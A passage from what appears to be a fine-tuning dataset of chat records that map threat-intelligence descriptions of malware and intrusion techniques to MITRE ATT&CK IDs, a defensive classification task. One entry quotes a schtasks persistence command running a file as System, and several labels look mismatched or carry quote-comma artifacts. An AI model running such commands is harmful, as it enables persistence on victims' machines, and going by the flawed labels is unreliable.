- "content": "GreyEnergy uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\\SYSTEM)."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GreyEnergy encrypts communications using RSA-2048."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT12 closely monitors online media related to its tools and operations and reacts when its tools are publicly disclosed"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The executable version of Helminth has a module to log keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CharmPower can use PowerShell for payload execution and C2 communication."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can capture webcam data on Windows and macOS systems."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "leveraged several compromised universities as proxies to obscure its origin."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses PowerView and Pywerview to perform discovery commands such as net user, net group, net local group, etc."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By gaining access to the configuration panel the attackers configured the Apache web server and started using the router as a proxy server between the organization’s corporate and restricted segments"
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When comparing the provided timestamps of the delivery documents to the timestamps for the remote template documents from Table 2, we find that the time to attack is directly correlated to the last time the templates are modified"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp', 'T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An uptick in activity from GRIM SPIDER, a subgroup of the criminal enterprise CrowdStrike Intelligence tracks as WIZARD SPIDER, has led to the identification of consistent actions employed to carry out their attacks. As part of their initial compromise — usually as a download from a spam email — they gain a foothold with their modular TrickBot malware, which was developed and is principally operated by WIZARD SPIDER. Once TrickBot is executed, new enumeration modules are downloaded onto the compromised machine to facilitate WIZARD SPIDER’s spread in search of credentials with the aim of gaining access to the domain controller. The criminal actors use RDP to perform lateral movement and explore the victim environment, with an end result of gaining access to the domain controller. Once this access has been achieved, GRIM SPIDER is able to deploy the Ryuk ransomware to the entire network"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols', 'T1021.001 - Remote Services: Remote Desktop Protocol', 'T1204.002 - User Execution: Malicious File', 'T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To summarize, the Mach-O does the following: Downloads a file from the URL supplied as an argument Decrypts this file using AES-128-EBC and TEA with a custom delta Writes the resulting file to $TMPDIR/airportpaird and makes it executable Uses the privilege escalation exploit to remove the com.apple.quarantineattribute from the file to avoid asking the user to confirm the launch of the unsigned executable"
- },
- {
- "role": "assistant",
- "content": "T1553.001 - Subvert Trust Controls: Gatekeeper Bypass"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Get-Keystrokes Exfiltration module can log keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Helminth has checked the local administrators group."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Trojan uses the access token to write the string above to the first file uploaded to Google drive whose filename is .txt"
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has detected a target system’s OS version and system volume information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has used certutil to decode a string into a cabinet file."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware deletes files in various ways, including \"suicide scripts\" to delete malware binaries from the victim. also uses secure file deletion to delete files from the victim. Additionally, malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The diagram in Figure 1 shows the samples, domains, IP addresses and e-mail addresses that we identified during our investigation (See Appendix B for more detail on these.) There is a clear split between Cluster A and Cluster B, with no infrastructure overlap between the two"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The archive contains two files; the first is an executable file, while the second is a decoy PDF document. The bear’s lair . The Stage-1 downloader will download and execute a new downloader, written in C++, not so different from other Zebrocy downloaders. How the bear hunts . In this section we describe in more detail the commands performed manually by the operators through their Delphi backdoor. As we did not identify a pattern in the order which the commands are invoked, we believe the operators are executing them manually. The first set of commands gathers information about the victim’s computer and environment: The commands above are commonly executed when the operators first connect to a newly activated backdoor. Moreover, the backdoor contains a list of filenames related to credentials from software listed below (database names): The operators take care of retrieving these databases if they are present on the victim’s computer. The operators retrieve these files on the machine using the DOWNLOAD_LIST command. This command can be used when the operators are aware of the presence of interesting files on the computer. This backdoor is executed using the CMD_EXECUTE command: There are some interesting facts here. The first set of commands is the same and executed during a very short timeframe, which raises another question: is it automated"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. Additionally, the process attempts to lower the overall security of the system by disabling security features in Microsoft Office and Windows Defender"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NOKKI has used rundll32 for execution."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An downloader creates persistence by creating the following scheduled task: schtasks /create /tn \"mysc\" /tr C:\\Users\\Public\\test.exe /sc ONLOGON /ru \"System\"."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For example, the following string would be included in one of the HTTP parameters sent to the C2 server: eRmaVsr90D-7Ig1ngV3PkdouzP974 In this specific case, the actor made a mistake when configuring this XAgent sample with its C2 locations"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed can achieve execution through users running malicious file attachments distributed via email."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS is capable of executing commands via cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PROMETHIUM has created new services and modified existing services for persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used VBScript to run WMI queries."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Duqu uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ECCENTRICBANDWAGON can delete log files generated from the malware stored at \"C:\\windows\\temp\\tmp0207\"."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor performs the injection by attaching its code into the APC queue using NtQueueApcThread API."
- },
- {
- "role": "assistant",
- "content": "T1055.004 - Process Injection: Asynchronous Procedure Call"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The discovery modules used with can collect information on network connections."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire contains modules that can discover and exploit various DLL hijacking opportunities."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork installed its payload in the startup programs folder as \"Baidu Software Update.\" The group also adds its second stage payload to the startup programs as “Net Monitor.\" They have also dropped QuasarRAT binaries as files named microsoft_network.exe and crome.exe."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoisonIvy hides any strings related to its own indicators of compromise."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has used brute force attacks to compromise valid credentials."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to discover processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor's dispatcher has used CreateProcessW API for execution."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has inserted malicious macros into existing documents, providing persistence when they are reopened. Gamaredon Group has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the \"/altvba\" option, once the Application.Startup event is received."
- },
- {
- "role": "assistant",
- "content": "T1137 - Office Application Startup"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Continuing Malicious Activity and Manipulating Additional Security Products After the module loads with regsvr32.exe, the Irdsnhrxxxfery64 module injects another module Irdsnhrxxxfery98, which was downloaded by the script into regsvr32.exe using the LoadLibraryExW() function"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoudMiner has obfuscated various scripts and encrypted DMG files."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Komplex payload is stored in a hidden directory at \"/Users/Shared/.local/kextd\"."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Regin malware platform uses Extended Attributes to store encrypted executables."
- },
- {
- "role": "assistant",
- "content": "T1564.004 - Hide Artifacts: NTFS File Attributes"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a Registry key to ensure a file gets executed upon reboot in order to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "They combine reconnaissance of GPO (Group Policy Object management for execution) with digitally-signed malware to avoid detection or blocking during their infection phases"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FinFisher clears the system event logs using \" OpenEventLog/ClearEventLog APIs \"."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stealth Falcon malware gathers the Address Resolution Protocol (ARP) table from the victim."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain information about the current user."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to pull down the backdoor, a payload stager, either HTTP or reverse-DNS, is executed with the use of a scheduled task"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sowbug extracted Word documents from a file server on a victim network."
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has delivered self-extracting 7z archive files within malicious document attachments, and used obfuscated or encrypted scripts."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lokibot has the ability to discover the computer name and Windows product name/version."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wingbird exploits CVE-2016-4117 to allow an executable to gain escalated privileges."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This attack begins with a spear phishing attack through a targeted email campaign. Over 80 files were sent to 40 email accounts within the organization, within the span of about an hour. The email contains Microsoft Excel attachments with malicious macros"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor has encrypted data symmetrically using a randomly generated Blowfish (OFB) key which is encrypted with a public RSA key."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Wekby group continues to target various high profile organizations using sophisticated malware. The pisloader malware family uses various novel techniques, such as using DNS as a C2 protocol, as well as making use of return-oriented programming and other anti-analysis tactics."
- },
- {
- "role": "assistant",
- "content": "T1583.002 - DNS Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The screenshot in Figure 8 of the inf method within a Cannon sample (SHA256: 4405cfbf28. ) shows the information gathered that is exfiltrated to the C2 via email, specifically with RunningPlace and LogicalDrives header strings"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use VBA to perform execution."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KillDisk loads and executes functions from a DLL."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It is commonly sold on various hacking forums as a keylogger and stealer that can be used to monitor systems and exfiltrate information from those systems"
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HTTPBrowser is capable of listing files, folders, and drives on a victim."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MegaCortex can parse the available drives and directories to determine which files to encrypt."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elise executes \"ipconfig /all\" after initial communication is made to the remote server."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "created a directory named \"out\" in the user's %AppData% folder and copied files to it."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has used steganography in multiple operations to conceal malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In doing so, it will attempt to detect the following Anti-Virus products via various techniques: Trend Micro Kaspersky Symantec Avira AVG ALYac Ahnlab Ahnlab and ALYac are the most widely used Anti-Virus solutions in South Korea, and Trend Micro and the rest are also known to be most widely used in Taiwan"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OutSteel can automatically upload collected files to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can enumerate shares on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
